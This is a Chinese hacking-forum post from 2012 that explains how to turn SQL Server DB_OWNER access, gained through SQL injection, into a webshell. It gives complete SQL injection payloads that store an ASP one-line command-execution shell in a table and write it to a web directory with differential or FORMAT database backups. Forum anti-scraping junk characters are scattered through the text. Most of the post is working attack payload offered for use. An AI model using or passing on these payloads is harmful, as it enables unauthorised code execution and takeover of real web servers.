找回密码
 立即注册
查看: 2713|回复: 0
打印 上一主题 下一主题

DB_OWNER权限得到webshell的改进办法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-9 21:31:07 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
DB_OWNER权限得到webshell的两点改进:
# t% s* Q, ]3 O; @, M4 b- l/ ]/ s6 ~2 q$ c& t9 Z4 S/ X
减少备份文件大小,得到可执行的webshell成功率提高不少
1 r$ Y: x1 l  W1 v  u( U" k一利用差异备份2 i8 s4 S) z* E2 v( O# A$ S4 }5 B
加一个参数WITH DIFFERENTIAL- d% j8 B8 Y: _

4 g( q% _" @8 U7 ?9 o# Y- L0 L1
' r# ?1 S; i2 s6 m3 k/ c5 p2, E$ \. |' T0 K( o6 a
36 S3 j) n* |. X$ p1 T4 w/ T* h
4  i2 b4 t! R. k- }
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s6 H0 k! A6 c* ?8 p  b
create table [dbo].[xiaolu] ([cmd] [image]);
1 u5 P, X4 T$ m# G) [7 iinsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
* d- r5 @9 [/ a- d$ @declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL
: H2 }, O! s. ?3 C
8 f& p8 W, e+ ^; v二利用完全FORMAT& A' N$ m, [* O
加一个参数WITH FROMAT
6 J7 {" M! b2 D+ D/ G有些页面对数据库要执行几次,而备份又默认是每次都以追加的方式,如果一个注入点对数据库有几次操作,而备份的文件就 几倍的增加,所以
3 |- o0 ~9 \, Q" K+ @) `! [
4 b# n3 p; ~* ~; ?19 W( D3 k( N* l' B
2
5 j2 Q9 A3 l+ m32 b& X) ^9 ^9 _
4! V  G0 M0 @+ l$ N. C
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
. a1 G, \! Y8 B; T& e4 `create table [dbo].[xiaolu] ([cmd] [image]);  t3 N( b! Y8 ?: I$ w9 p
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
( b4 T, e- a6 p) {) `7 jdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT 9 k/ T* h: x, G$ _

$ T1 O* n' ~  a4 @2 m. `总的来说就是那么简单几句,下面以备份数据库model为例子
: u8 O5 B3 d# `* l* Z6 X& a1
0 N" q# ?* {! P3 \3 J' s% L; [7 a/ O, V
1' }4 W! K9 @8 P; L- L% |9 [
id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
" Z1 F& j- }$ _% O- T2 p: e; Y. g: T+ I% c# w! q
2% k1 N$ @$ Y; a( a; P6 O

0 @# ]' m& q8 g$ P1 m" X6 ^9 G' S, g1+ c5 |2 L. `! S# G! M- D
id=1;backup database model to disk='你的路径‘ with differential,format;-- ; K" e( S+ t) _7 I" k8 i
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表